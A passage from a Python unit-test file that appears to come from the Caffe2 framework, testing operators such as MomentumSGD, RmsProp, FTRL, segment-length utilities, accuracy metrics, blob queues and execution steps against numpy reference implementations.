momentum=st.floats(min_value=0.1, max_value=0.9),
nesterov=st.booleans(),
lr=st.floats(min_value=0.1, max_value=0.9),
**hu.gcs)
def test_momentum_sgd(
self, inputs, in_place, momentum, nesterov, lr, gc, dc):
grad, m = inputs
lr = np.asarray([lr], dtype=np.float32)
op = core.CreateOperator(
"MomentumSGD",
["grad", "m", "lr"],
["grad" if in_place else "grad_o",
"m" if in_place else "m_o"],
momentum=momentum,
nesterov=int(nesterov),
device_option=gc)
self.assertDeviceChecks(
dc, op, [grad, m, lr], [0])
# Reference
def momentum_sgd(grad, m, lr):
lr = lr[0]
if not nesterov:
adjusted_gradient = lr * grad + momentum * m
return (adjusted_gradient, adjusted_gradient)
else:
m_new = momentum * m + lr * grad
return ((1 + momentum) * m_new - momentum * m, m_new)
self.assertReferenceChecks(gc, op, [grad, m, lr], momentum_sgd)
@given(inputs=hu.tensors(n=3),
in_place=st.booleans(),
decay=st.floats(min_value=0.1, max_value=0.9),
momentum=st.floats(min_value=0.1, max_value=0.9),
lr=st.floats(min_value=0.1, max_value=0.9),
epsilon=st.floats(min_value=1e-5, max_value=1e-2),
**hu.gcs)
def test_rmsprop_sgd(self, inputs, in_place, decay, momentum, lr, epsilon,
gc, dc):
grad, ms, mom = inputs
ms = np.abs(ms) + 0.01
lr = np.asarray([lr], dtype=np.float32)
op = core.CreateOperator(
"RmsProp",
["grad", "ms", "mom", "lr"],
["grad" if in_place else "grad_o",
"ms" if in_place else "ms_o",
"mom" if in_place else "mom_o"],
momentum=momentum, decay=decay, epsilon=epsilon, device_option=gc)
self.assertDeviceChecks(dc, op, [grad, ms, mom, lr], [0])
def rmsprop(grad, ms, mom, lr):
lr = lr[0]
ms_o = ms + (1. - decay) * (np.square(grad) - ms)
mom_o = momentum * mom + lr * grad / np.sqrt(epsilon + ms_o)
grad_o = mom_o
return (grad_o, ms_o, mom_o)
self.assertReferenceChecks(gc, op, [grad, ms, mom, lr], rmsprop)
# Reference
@staticmethod
def _dense_ftrl(alpha, beta, lambda1, lambda2, w, nz, g):
if isinstance(alpha, np.ndarray):
alpha = np.asscalar(alpha)
n = np.take(nz, 0, axis=-1)
z = np.take(nz, 1, axis=-1)
# python port of Sigrid's implementation
g2 = g * g
sigma = (np.sqrt(n + g2) - np.sqrt(n)) / alpha
z += g - sigma * w
n += g2
w = (np.sign(z) * lambda1 - z) / (
(beta + np.sqrt(n)) / alpha + lambda2)
w[np.abs(z) <= lambda1] = 0
return (w, np.stack([n, z], axis=-1))
@given(inputs=hu.tensors(n=4),
in_place=st.booleans(),
alpha=st.floats(min_value=0.01, max_value=0.1),
beta=st.floats(min_value=0.1, max_value=0.9),
lambda1=st.floats(min_value=0.001, max_value=0.1),
lambda2=st.floats(min_value=0.001, max_value=0.1),
engine=st.sampled_from([None, "SIMD"]),
**hu.gcs_cpu_only)
def test_ftrl_sgd(self, inputs, in_place, alpha, beta, lambda1, lambda2,
engine, gc, dc):
var, n, z, grad = inputs
n = np.abs(n)
nz = np.stack([n, z], axis=-1)
op = core.CreateOperator(
"Ftrl",
["var", "nz", "grad"],
["var" if in_place else "var_o",
"nz" if in_place else "nz_o"],
alpha=alpha, beta=beta, lambda1=lambda1, lambda2=lambda2,
engine=engine,
device_option=gc)
self.assertDeviceChecks(
dc, op, [var, nz, grad], [0])
self.assertReferenceChecks(
gc, op, [var, nz, grad],
partial(self._dense_ftrl, alpha, beta, lambda1, lambda2))
@given(inputs=hu.tensors(n=4),
alpha=st.floats(min_value=0.01, max_value=0.1),
beta=st.floats(min_value=0.1, max_value=0.9),
lambda1=st.floats(min_value=0.001, max_value=0.1),
lambda2=st.floats(min_value=0.001, max_value=0.1),
engine=st.sampled_from([None, "SIMD"]),
**hu.gcs_cpu_only)
def test_sparse_ftrl_sgd(self, inputs, alpha, beta, lambda1, lambda2,
engine, gc, dc):
var, n, z, grad = inputs
# generate fake subset manually because hypothesis is too complicated :)
indices = np.arange(var.shape[0])
indices = indices[indices % 2 == 0]
grad = grad[indices]
n = np.abs(n)
nz = np.stack([n, z], axis=-1)
op = core.CreateOperator(
"SparseFtrl",
["var", "nz", "indices", "grad"],
["var", "nz"],
alpha=alpha, beta=beta, lambda1=lambda1, lambda2=lambda2,
engine=engine,
device_option=gc)
self.assertDeviceChecks(
dc, op, [var, nz, indices, grad], [0])
# Reference
def ftrl(w, nz, i, g):
sw, snz = self._dense_ftrl(alpha, beta, lambda1, lambda2,
w[i], nz[i], g)
w[i] = sw
nz[i] = snz
return (w, nz)
self.assertReferenceChecks(gc, op, [var, nz, indices, grad], ftrl)
# Reference
@staticmethod
def _dense_ftrl_send_alpha_by_input(beta, lambda1, lambda2, w, nz, g, alpha):
return TestOperators._dense_ftrl(alpha, beta, lambda1, lambda2, w, nz,
g)
@given(inputs=hu.tensors(n=4),
in_place=st.booleans(),
alpha=st.floats(min_value=0.01, max_value=0.1),
beta=st.floats(min_value=0.1, max_value=0.9),
lambda1=st.floats(min_value=0.001, max_value=0.1),
lambda2=st.floats(min_value=0.001, max_value=0.1),
engine=st.sampled_from([None, "SIMD"]),
**hu.gcs_cpu_only)
def test_ftrl_sgd_send_alpha_by_input(self, inputs, in_place, alpha, beta,
lambda1, lambda2, engine, gc, dc):
var, n, z, grad = inputs
n = np.abs(n)
nz = np.stack([n, z], axis=-1)
alpha = np.array(alpha).astype(np.float32)
op = core.CreateOperator(
"Ftrl",
["var", "nz", "grad", "alpha"],
["var" if in_place else "var_o",
"nz" if in_place else "nz_o"],
beta=beta, lambda1=lambda1, lambda2=lambda2,
engine=engine,
device_option=gc)
self.assertDeviceChecks(
dc, op, [var, nz, grad, alpha], [0])
self.assertReferenceChecks(
gc, op, [var, nz, grad, alpha],
partial(self._dense_ftrl_send_alpha_by_input, beta, lambda1, lambda2))
@given(inputs=hu.tensors(n=4),
alpha=st.floats(min_value=0.01, max_value=0.1),
beta=st.floats(min_value=0.1, max_value=0.9),
lambda1=st.floats(min_value=0.001, max_value=0.1),
lambda2=st.floats(min_value=0.001, max_value=0.1),
engine=st.sampled_from([None, "SIMD"]),
**hu.gcs_cpu_only)
def test_sparse_ftrl_sgd_send_alpha_by_input(self, inputs, alpha, beta,
lambda1, lambda2, engine, gc,
dc):
var, n, z, grad = inputs
# generate fake subset manually because hypothesis is too complicated :)
indices = np.arange(var.shape[0])
indices = indices[indices % 2 == 0]
grad = grad[indices]
n = np.abs(n)
nz = np.stack([n, z], axis=-1)
alpha = np.array(alpha).astype(np.float32)
op = core.CreateOperator(
"SparseFtrl",
["var", "nz", "indices", "grad", "alpha"],
["var", "nz"],
beta=beta, lambda1=lambda1, lambda2=lambda2,
engine=engine,
device_option=gc)
self.assertDeviceChecks(
dc, op, [var, nz, indices, grad, alpha], [0])
# Reference
def ftrl(w, nz, i, g, alpha):
sw, snz = self._dense_ftrl_send_alpha_by_input(beta, lambda1,
lambda2, w[i], nz[i],
g, alpha)
w[i] = sw
nz[i] = snz
return (w, nz)
self.assertReferenceChecks(gc, op, [var, nz, indices, grad, alpha],
ftrl)
@given(input=hu.tensor(max_value=20,
max_dim=1,
dtype=np.int32,
elements=st.integers(min_value=0, max_value=10)),
with_remapping=st.booleans(),
**hu.gcs)
def test_unique(self, input, with_remapping, gc, dc):
op = core.CreateOperator(
"Unique",
["input"],
["unique"] + (["remapping"] if with_remapping else []),
device_option=gc)
self.assertDeviceChecks(dc, op, [input], [0])
# Validator
def unique_valid(input, unique, remapping=None):
self.assertEqual(unique.size, len(set(input)))
self.assertEqual(sorted(unique), sorted(set(input)))
if with_remapping:
self.assertEqual(remapping.shape, input.shape)
remapped = [unique[remapping[i]] for i in range(len(input))]
np.testing.assert_array_equal(remapped, input)
self.assertValidationChecks(gc, op, [input], unique_valid)
@given(prediction=hu.arrays(dims=[10, 3],
elements=st.floats(allow_nan=False,
allow_infinity=False,
min_value=0,
max_value=1)),
labels=hu.arrays(dims=[10],
dtype=np.int32,
elements=st.integers(min_value=0,
max_value=3 - 1)),
top_k=st.integers(min_value=1, max_value=3),
**hu.gcs)
def test_accuracy(self, prediction, labels, top_k, gc, dc):
if(top_k > 1):
gc = hu.cpu_do
op = core.CreateOperator(
"Accuracy",
["prediction", "labels"],
["accuracy"],
top_k=top_k,
device_option=gc
)
def op_ref(prediction, labels, top_k):
N = prediction.shape[0]
correct = 0
for i in range(0, len(prediction)):
pred_sorted = sorted(
([item, j] for j, item in enumerate(prediction[i])),
key=lambda x: x[0],
reverse=True
)
max_ids = [x[1] for x in pred_sorted[0:top_k]]
for m in max_ids:
if m == labels[i]:
correct += 1
accuracy = correct / N
return (accuracy,)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[prediction, labels, top_k],
reference=op_ref)
@given(target_probabilities=hu.arrays(
dims=[10], elements=st.floats(allow_nan=False,
allow_infinity=False,
min_value=0.01,
max_value=1)),
**hu.gcs)
def test_perplexity(self, target_probabilities, gc, dc):
op = core.CreateOperator(
"Perplexity",
["target_probabilities"],
["perplexity"]
)
def op_ref(target_probabilities):
N = target_probabilities.shape[0]
perplexities = np.power(target_probabilities, -1.0 / N)
perplexity = reduce(lambda x, y: x * y, perplexities)
return (perplexity,)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[target_probabilities],
reference=op_ref)
@given(lengths=st.lists(st.integers(min_value=0, max_value=10),
min_size=0,
max_size=10),
**hu.gcs_cpu_only)
def test_lengths_to_segment_ids(self, lengths, gc, dc):
op = core.CreateOperator(
"LengthsToSegmentIds",
["lengths"],
["segment_ids"])
def op_ref(lengths):
sids = []
for i, l in enumerate(lengths):
sids.extend(l * [i])
return (np.array(sids, dtype=np.int32), )
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[np.array(lengths, dtype=np.int32)],
reference=op_ref)
@given(lengths=st.lists(st.integers(min_value=0, max_value=10),
min_size=0,
max_size=10),
**hu.gcs_cpu_only)
def test_lengths_range_fill(self, lengths, gc, dc):
op = core.CreateOperator(
"LengthsRangeFill",
["lengths"],
["increasing_seq"])
def op_ref(lengths):
sids = []
for _, l in enumerate(lengths):
sids.extend(list(range(l)))
return (np.array(sids, dtype=np.int32), )
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[np.array(lengths, dtype=np.int32)],
reference=op_ref)
@given(**hu.gcs_cpu_only)
def test_segment_ids_to_ranges(self, gc, dc):
lengths = [4, 6, 3, 2, 0, 4]
op = core.CreateOperator(
"SegmentIdsToRanges",
["segment_ids"],
["ranges"])
def op_ref(segment_ids):
ranges = [np.array([0, 0], dtype=np.int32)]
prev = 0
for i, sid in enumerate(segment_ids):
while sid != prev:
prev += 1
ranges.append(np.array([i, 0], dtype=np.int32))
ranges[-1][1] += 1
return (np.array(ranges, dtype=np.int32), )
def lengths_to_segment_ids(lengths):
sids = []
for i, l in enumerate(lengths):
sids.extend(l * [i])
return (np.array(sids, dtype=np.int32), )
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=np.array(lengths_to_segment_ids(lengths), dtype=np.int32),
reference=op_ref)
@given(lengths=st.lists(st.integers(min_value=0, max_value=10),
min_size=0,
max_size=10),
**hu.gcs_cpu_only)
def test_lengths_to_ranges(self, lengths, gc, dc):
op = core.CreateOperator(
"LengthsToRanges",
["lengths"],
["ranges"])
def op_ref(x):
if not x.size:
return (x.reshape((0, 2)), )
return (np.column_stack((np.concatenate(([0], np.cumsum(x)[:-1])),
x)), )
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[np.array(lengths, dtype=np.int32)],
reference=op_ref)
@given(prediction=hu.arrays(dims=[10, 3],
elements=st.floats(allow_nan=False,
allow_infinity=False,
min_value=0,
max_value=1)),
labels=hu.arrays(dims=[10],
dtype=np.int32,
elements=st.integers(min_value=0,
max_value=3 - 1)),
**hu.gcs)
def test_multi_class_accuracy(self, prediction, labels, gc, dc):
op = core.CreateOperator(
"MultiClassAccuracy",
["prediction", "labels"],
["accuracies", "amounts"]
)
def op_ref(prediction, labels):
N = prediction.shape[0]
D = prediction.shape[1]
accuracies = np.empty(D, dtype=float)
accuracies.fill(0)
amounts = np.empty(D, dtype=int)
amounts.fill(0)
max_ids = np.argmax(prediction, axis=1)
for i in range(0, N):
max_id = max_ids[i]
label_id = labels[i]
if max_id == label_id:
accuracies[label_id] += 1
amounts[label_id] += 1
for i in range(0, D):
amount = amounts[i]
if amount:
accuracies[i] /= amount
return (accuracies, amounts,)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[prediction, labels],
reference=op_ref)
@given(lengths=st.lists(st.integers(min_value=0, max_value=10),
min_size=0,
max_size=10),
**hu.gcs_cpu_only)
def test_segment_ids_to_lengths(self, lengths, gc, dc):
op = core.CreateOperator(
"SegmentIdsToLengths",
["segment_ids"],
["lengths"])
def lengths_to_ids(lengths):
sids = []
for i, l in enumerate(lengths):
sids.extend(l * [i])
return sids
segment_ids = lengths_to_ids(lengths)
def ids_to_lengths(ids):
ids_length = len(ids)
if ids_length == 0:
return (np.array([], dtype=np.int32),)
lengths = []
# segment id starts with 0
prev_id = -1
tmp_length = 0
for idx in range(ids_length):
cur_id = ids[idx]
if cur_id != prev_id:
if idx != 0:
lengths.append(tmp_length)
while prev_id + 1 != cur_id:
lengths.append(0)
prev_id += 1
prev_id = cur_id
tmp_length = 0
tmp_length += 1
lengths.append(tmp_length)
return (np.array(lengths, dtype=np.int32),)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[np.array(segment_ids, dtype=np.int32)],
reference=ids_to_lengths)
@given(lengths=st.lists(st.integers(min_value=1, max_value=10),
min_size=0,
max_size=10),
power=st.sampled_from([0.5, 1.0, 1.5, 2.0]),
**hu.gcs_cpu_only)
def test_lengths_to_weights(self, lengths, power, gc, dc):
op = core.CreateOperator(
"LengthsToWeights",
["lengths"],
["weights"],
power=power)
def lengths_to_weights(lengths):
weighted_length = []
for l in lengths:
weighted_length.extend(l * [1 / pow(l, power)])
return (np.array(weighted_length, dtype=float),)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[np.array(lengths, dtype=np.int32)],
reference=lengths_to_weights)
@given(input_tensor=hu.arrays(
dims=[10], elements=st.floats(allow_nan=False,
allow_infinity=False)),
**hu.gcs)
def test_abs(self, input_tensor, gc, dc):
op = core.CreateOperator(
"Abs",
["input"],
["output"]
)
def abs_ref(input_tensor):
return (np.abs(input_tensor),)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[input_tensor],
reference=abs_ref)
@given(input_tensor=hu.arrays(
dims=[10], elements=st.floats(min_value=-10,
max_value=10)),
**hu.gcs)
def test_cos(self, input_tensor, gc, dc):
op = core.CreateOperator(
"Cos",
["input"],
["output"]
)
def cos_ref(input_tensor):
return (np.cos(input_tensor),)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[input_tensor],
reference=cos_ref)
@given(input_tensor=hu.arrays(
dims=[10], elements=st.floats(min_value=-10,
max_value=10)),
**hu.gcs)
def test_sin(self, input_tensor, gc, dc):
op = core.CreateOperator(
"Sin",
["input"],
["output"]
)
def sin_ref(input_tensor):
return (np.sin(input_tensor),)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[input_tensor],
reference=sin_ref)
@given(input_tensor=hu.arrays(
dims=[10], elements=st.floats(allow_nan=False,
allow_infinity=False)),
**hu.gcs)
def test_exp(self, input_tensor, gc, dc):
op = core.CreateOperator(
"Exp",
["input"],
["output"]
)
def exp_ref(input_tensor):
return (np.exp(input_tensor),)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[input_tensor],
reference=exp_ref)
@given(input_tensor=hu.arrays(
dims=[10], elements=st.floats(min_value=1,
max_value=10000)),
**hu.gcs_cpu_only)
def test_log(self, input_tensor, gc, dc):
op = core.CreateOperator(
"Log",
["input"],
["output"]
)
def log_ref(input_tensor):
return (np.log(input_tensor),)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[input_tensor],
reference=log_ref)
self.assertGradientChecks(gc, op, [input_tensor], 0, [0])
def test_blobs_dequeue_timeout(self):
op = core.CreateOperator(
"CreateBlobsQueue",
[],
["queue"],
capacity=5,
num_blobs=1)
self.ws.run(op)
t = time.time()
op = core.CreateOperator(
"DequeueBlobs",
["queue"],
["out"],
timeout_secs=0.2)
self.assertRaises(RuntimeError, lambda: self.ws.run(op))
t = time.time() - t
self.assertGreater(t, 0.19)
@given(num_threads=st.integers(1, 10), # noqa
num_elements=st.integers(1, 100),
capacity=st.integers(1, 5),
num_blobs=st.integers(1, 3),
do=st.sampled_from(hu.device_options))
def test_blobs_queue_threading(self, num_threads, num_elements,
capacity, num_blobs, do):
"""
- Construct matrices of size N x D
- Start K threads
- Push all N rows into the queue of capacity C
- Pull all N rows out of the queue.
- Verify that the output matrices are permutation of the rows of the
original matrices.
"""
import threading
try:
import queue
except ImportError:
# Py3
import Queue as queue
op = core.CreateOperator(
"CreateBlobsQueue",
[],
["queue"],
capacity=capacity,
num_blobs=num_blobs,
device_option=do)
self.ws.run(op)
xs = [np.random.randn(num_elements, 5).astype(np.float32)
for _ in range(num_blobs)]
q = queue.Queue()
for i in range(num_elements):
q.put([x[i] for x in xs])
def enqueue(t):
while True:
feed_blobs = ["x_{}_{}".format(i, t) for i in range(num_blobs)]
op = core.CreateOperator(
"EnqueueBlobs",
["queue"] + feed_blobs,
feed_blobs,
device_option=do)
try:
elems = q.get_nowait()
for elem, feed_blob in zip(elems, feed_blobs):
self.ws.create_blob(feed_blob).feed(
elem, device_option=do)
self.ws.run(op)
except queue.Empty:
return
# Create all blobs before racing on multiple threads
# (blob creation is not threadsafe)
for t in range(num_threads):
for i in range(num_blobs):
self.ws.create_blob("x_{}_{}".format(i, t))
threads = [threading.Thread(target=enqueue, args=(t,))
for t in range(num_threads)]
for thread in threads:
thread.start()
for n in range(num_elements):
dequeue_blobs = ["y_{}_{}".format(i, n) for i in range(num_blobs)]
op = core.CreateOperator(
"DequeueBlobs",
["queue"],
dequeue_blobs,
device_option=do)
self.ws.run(op)
for thread in threads:
thread.join()
op = core.CreateOperator("CloseBlobsQueue", ["queue"], [])
self.ws.run(op)
ys = [np.vstack([self.ws.blobs["y_{}_{}".format(i, n)].fetch()
for n in range(num_elements)])
for i in range(num_blobs)]
for i in range(num_blobs):
self.assertEqual(ys[i].shape, xs[i].shape)
for j in range(num_elements):
# Verify that the rows of the returned blob are a
# permutation. The order may be different due to
# different threads racing.
self.assertTrue(
any(np.array_equal(xs[i][j], ys[i][k])
for k in range(num_elements)))
@given(num_producers=st.integers(1, 10),
num_consumers=st.integers(1, 10),
capacity=st.integers(1, 5),
num_blobs=st.integers(1, 3),
do=st.sampled_from(hu.device_options))
def test_safe_blobs_queue(self, num_producers, num_consumers,
capacity, num_blobs, do):
init_net = core.Net('init_net')
queue = init_net.CreateBlobsQueue(
[], 1, capacity=capacity, num_blobs=num_blobs)
producer_steps = []
truth = 0
for i in range(num_producers):
name = 'producer_%d' % i
net = core.Net(name)
blobs = [net.ConstantFill([], 1, value=1.0, run_once=False)
for times in range(num_blobs)]
status = net.NextName()
net.SafeEnqueueBlobs([queue] + blobs, blobs + [status])
count = (i + 1) * 10
step = core.execution_step(name, net, num_iter=count)
truth += count
producer_steps.append(step)
producer_exit_net = core.Net('producer_exit_net')
producer_exit_net.CloseBlobsQueue([queue], 0)
producer_step = core.execution_step('producer', [
core.execution_step(
'producers', producer_steps, concurrent_substeps=True),
core.execution_step('producer_exit', producer_exit_net)]
)
consumer_steps = []
counters = []
const_1 = init_net.ConstantFill([], 1, value=1.0)
for i in range(num_consumers):
name = 'consumer_%d' % i
net1 = core.Net(name)
blobs = net1.SafeDequeueBlobs([queue], num_blobs + 1)
status = blobs[-1]
net2 = core.Net(name + '_counter')
counter = init_net.ConstantFill([], 1, value=0.0)
counters.append(counter)
net2.Add([counter, const_1], counter)
consumer_steps.append(core.execution_step(
name, [net1, net2], should_stop_blob=status))
consumer_step = core.execution_step(
'consumer', consumer_steps, concurrent_substeps=True)
init_step = core.execution_step('init', init_net)
worker_step = core.execution_step(
'worker', [consumer_step, producer_step], concurrent_substeps=True)
plan = core.Plan('test')
plan.AddStep(init_step)
plan.AddStep(worker_step)
self.ws.run(plan)
v = 0
for counter in counters:
v += self.ws.blobs[str(counter)].fetch().tolist()
self.assertEqual(v, truth)
@given(num_queues=st.integers(1, 5),
num_iter=st.integers(5, 10),
capacity=st.integers(1, 5),
num_blobs=st.integers(1, 3))
def test_weighted_sample_blobs_queue(
self, num_queues, num_iter, capacity, num_blobs
):
# Create BlobsQueue for each input queue
print("num_queues", num_queues)
init_net = core.Net('init_net')
queues = [
init_net.CreateBlobsQueue(
[], 1, capacity=capacity, num_blobs=num_blobs
) for _ in range(num_queues)
]
# Create multiple producer nets and one producer exist net
producer_steps = []
producer_exit_nets = []
for i in range(num_queues):
name = 'producer_%d' % i
net = core.Net(name)
blobs = [net.ConstantFill([], 1, value=1.0, run_once=False)
for _ in range(num_blobs)]
status = net.NextName()
net.SafeEnqueueBlobs([queues[i]] + blobs, blobs + [status])
exit_net = core.Net('producer_exit_%d' % i)
exit_net.CloseBlobsQueue(queues[i], 0)
producer_exit_nets.append(exit_net)
step = core.execution_step(
name, [
core.execution_step(
'producer_%d' % i, [net], num_iter=num_iter
),
core.execution_step('producer_exit_%d' % i, [exit_net]),
]
)
producer_steps.append(step)
producer_step = core.execution_step(
'producer', [
core.execution_step(
'producers',
producer_steps,
concurrent_substeps=True,
),
]
)
status_lst = []
def append(ins, outs):
status_lst.append(ins)
# Create one consumer dequeue net and one consumer exist net
consumer_net = core.Net('weight_sample_dequeue_net')
blobs = consumer_net.WeightedSampleDequeueBlobs(
queues,
num_blobs + 1,
weights=np.random.uniform(low=0.0, high=1.0, size=(num_queues,))
)
status = blobs[-1]
consumer_net.Python(append)(status)
consumer_step = core.execution_step(
'consumer',
[
core.execution_step(
'consumer', [consumer_net], should_stop_blob=status
),
core.execution_step('producer_exit', producer_exit_nets)
]
)
init_step = core.execution_step('init', init_net)
worker_step = core.execution_step(
'worker', [producer_step, consumer_step], concurrent_substeps=True)
plan = core.Plan('test')
plan.AddStep(init_step)
plan.AddStep(worker_step)
self.ws.run(plan)
assert len(status_lst) >= num_iter + 1
assert len(status_lst) <= num_iter * num_queues + 1
@given(
data=hu.tensor(),
**hu.gcs_cpu_only)
def test_squeeze_expand_dims(self, data, gc, dc):
dims = [0, 0]
if len(data.shape) > 2:
dims.append(2)
op = core.CreateOperator(
"ExpandDims",
["data"],
["expanded"],
dims=dims)
def expand_dims_ref(data, *args, **kw):
inc_dims = list(set(dims))
inc_dims.sort()
r = data
for dim in inc_dims:
r = np.expand_dims(r, axis=dim)
return (r, )
def squeeze_ref(data, *args, **kw):
dec_dims = list(set(dims))
dec_dims.sort(reverse=True)
r = data
for dim in dec_dims:
r = np.squeeze(r, axis=dim)
return (r, )
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[data],
reference=expand_dims_ref,
output_to_grad='expanded',
grad_reference=squeeze_ref)
@given(**hu.gcs_cpu_only)
def test_tt_layer(self, gc, dc):
seed = 1234
np.random.seed(seed)
inp_sizes = [2, 2, 2, 2]
out_sizes = [2, 2, 2, 2]
tt_ranks = [1, 3, 3, 3, 1]
op = core.CreateOperator(
"TT",
["X", "b", "cores"],
["Y"],
inp_sizes=inp_sizes,
out_sizes=out_sizes,
tt_ranks=tt_ranks,
)
X = np.expand_dims(
np.random.rand(16).astype(np.float32), axis=0)
b = np.array([0] * 16).astype(np.float32)
cores = tt_core.init_tt_cores(inp_sizes, out_sizes, tt_ranks)
self.ws.create_blob("X").feed(X)
self.ws.create_blob("b").feed(b)
self.ws.create_blob("cores").feed(cores)
self.ws.run(op)
Y = self.ws.blobs[("Y")].fetch()
Y = Y.reshape([16])
golden = np.array([-9.51763490e-07, -1.28442286e-06,
-2.86281141e-07, 2.28865644e-07,
-1.96180017e-06, -1.78920531e-06,
9.31094666e-07, -2.04273989e-07,
1.70017107e-06, 1.64845711e-06,
-1.06099132e-06, -4.69111137e-07,
6.57552358e-08, -1.28942040e-08,
-2.29114004e-07, -1.04262714e-06])
# This golden array is dependent on the specified inp_sizes, out_sizes,
# tt_ranks, and seed. Changing these will cause the test to fail.
self.assertAlmostEqual(np.linalg.norm(golden - Y), 0, delta=1e-10)
@given(num_workers=st.integers(1, 10),
net_type=st.sampled_from(
["simple", "dag"] +
(["async_dag"] if workspace.has_gpu_support else [])),
do=st.sampled_from(hu.device_options))
def test_dag_net_forking(self, net_type, num_workers, do):
from caffe2.python.model_helper import ModelHelper
from caffe2.python import brew
m = ModelHelper(name="test_model")
n = 10
d = 2
depth = 2
iters = 5
np.random.seed(1701)
# Build a binary tree of FC layers, summing at each node.
for i in reversed(range(depth)):
for j in range(2 ** i):
bottom_1 = "{}_{}".format(i + 1, 2 * j)
bottom_2 = "{}_{}".format(i + 1, 2 * j + 1)
mid_1 = "{}_{}_m".format(i + 1, 2 * j)
mid_2 = "{}_{}_m".format(i + 1, 2 * j + 1)
top = "{}_{}".format(i, j)
brew.fc(
m,
bottom_1, mid_1,
dim_in=d, dim_out=d,
weight_init=('ConstantFill', dict(value=np.random.randn())),
bias_init=('ConstantFill', dict(value=np.random.randn())))
brew.fc(
m,
bottom_2, mid_2,
dim_in=d, dim_out=d,
weight_init=('ConstantFill', dict(value=np.random.randn())),
bias_init=('ConstantFill', dict(value=np.random.randn())))
m.net.Sum([mid_1, mid_2], top)
m.net.SquaredL2Distance(["0_0", "label"], "xent")
m.net.AveragedLoss("xent", "loss")
input_to_grad = m.AddGradientOperators(["loss"])
m.Proto().device_option.CopyFrom(do)
m.param_init_net.Proto().device_option.CopyFrom(do)
m.Proto().type = net_type
m.Proto().num_workers = num_workers
self.ws.run(m.param_init_net)
print(str(m.Proto()))
def run():
import numpy as np
np.random.seed(1701)
input_blobs = ["{}_{}".format(depth, j) for j in range(2 ** depth)]
for input_blob in input_blobs:
self.ws.create_blob(input_blob).feed(
np.random.randn(n, d).astype(np.float32),
device_option=do)
self.ws.create_blob("label").feed(
np.random.randn(n, d).astype(np.float32),
device_option=do)
self.ws.run(m.net)
gradients = [
self.ws.blobs[str(input_to_grad[input_blob])].fetch()
for input_blob in input_blobs]
return gradients
outputs = [run() for _ in range(iters)]
for output in outputs[1:]:
np.testing.assert_array_equal(outputs[0], output)
self.assertAlmostEqual(np.sum(np.square(output)), 91.81752,
delta=1e-2)
@given(input=hu.tensor(min_dim=2, max_dim=6, dtype=np.int32,
elements=st.integers(min_value=0,
max_value=2**32 - 1)),
slice_dim=st.integers(),
a=st.integers(),
b=st.integers(),
is_empty=st.booleans(),
**hu.gcs_cpu_only)
def test_slice(self, input, slice_dim, a, b, is_empty, gc, dc):
slice_dim = slice_dim % len(input.shape)
if (is_empty):
input = np.random.rand(*([0] + list(input.shape))).astype(np.int32)
slice_dim += 1
a = a % input.shape[slice_dim]
b = b % input.shape[slice_dim] + 1
start_vec = np.zeros(len(input.shape), dtype=np.int32)
end_vec = np.ones(len(input.shape), dtype=np.int32) * -1
start_vec[slice_dim] = min(a, b)
end_vec[slice_dim] = max(a, b)
op = core.CreateOperator(
"Slice",
["input", "start", "end"],
["output"])
def slice_ref(x, s, e):
if len(s.shape) == 0:
return x
slc = [slice(si, None if ei == -1 else ei) for si, ei in zip(s, e)]
return (x[slc], )
self.assertReferenceChecks(gc, op, [input, start_vec, end_vec],
slice_ref)
@given(data=hu.tensor(), **hu.gcs_cpu_only)
def test_shape(self, data, gc, dc):
op = core.CreateOperator("Shape", ["data"], ["shape"])
self.assertReferenceChecks(gc, op, [data], lambda x: (x.shape, ))
@given(data=hu.tensor(), **hu.gcs_cpu_only)
def test_has_elements(self, data, gc, dc):
op = core.CreateOperator("HasElements", ["data"], ["has_elements"])
self.assertReferenceChecks(gc, op, [data], lambda x: (len(x) > 0, ))
op = core.CreateOperator("IsEmpty", ["data"], ["is_empty"])
self.assertReferenceChecks(gc, op, [data], lambda x: (len(x) == 0, ))
@given(initial_iters=st.integers(0, 100),
max_iters=st.integers(0, 100))
def test_should_stop_as_criteria_net_execution_step(
self, initial_iters, max_iters):
net = core.Net("net")
net.Iter(["iter"], ["iter"])
self.ws.create_blob("iter").feed(
np.asarray([initial_iters]).astype(np.int64))
self.ws.create_blob("num_iters").feed(
np.asarray([max_iters]).astype(np.int64))
criteria_net = core.Net("criteria")
criteria_net.GE(["iter", "num_iters"], ["stop"])
criteria_net.Proto().external_output.extend(["stop"])
plan = core.Plan('plan')
plan.AddStep(core.execution_step(
'step', [criteria_net, net],
should_stop_blob=core.BlobReference("stop")))
self.ws.run(plan)
iters = self.ws.blobs[("iter")].fetch()
self.assertEqual(iters.dtype, np.int64)
self.assertEqual(iters[0], max(initial_iters, max_iters))
def test_disabled_execution_step(self):
def createNets(i, disabled):
should_stop = 'should_stop_{}'.format(i)
output = 'output_{}'.format(i)
# init content and stop signal
init = core.Net("init_{}".format(i))
init.ConstantFill(
[],
[output],
shape=[1],
value=0.0
)
init.Cast([output], [should_stop], to='bool')
# decide if disabled or not
criterion = core.Net("criterion_{}".format(i))
tmp = criterion.ConstantFill(
[],
shape=[1],
value=1.0 if disabled else 0.0
)
criterion.Cast([tmp], [should_stop], to='bool')
criterion.Proto().external_output.extend([should_stop])
# the body net is just to turn a 0 blob to 1
net = core.Net("net_{}".format(i))
net.ConstantFill(
[],
[output],
shape=[1],
value=1.0
)
# always end the loop
ender = core.Net("ender_{}".format(i))
tmp = ender.ConstantFill(
[],
shape=[1],
value=1.0
)
ender.Cast([tmp], [should_stop], to='bool')
ender.Proto().external_output.extend([should_stop])
return [init, criterion, net, ender]
nets = [createNets(1, False),
createNets(2, True),
createNets(3, False)]
steps = [
core.execution_step(
'step_1', nets[0],
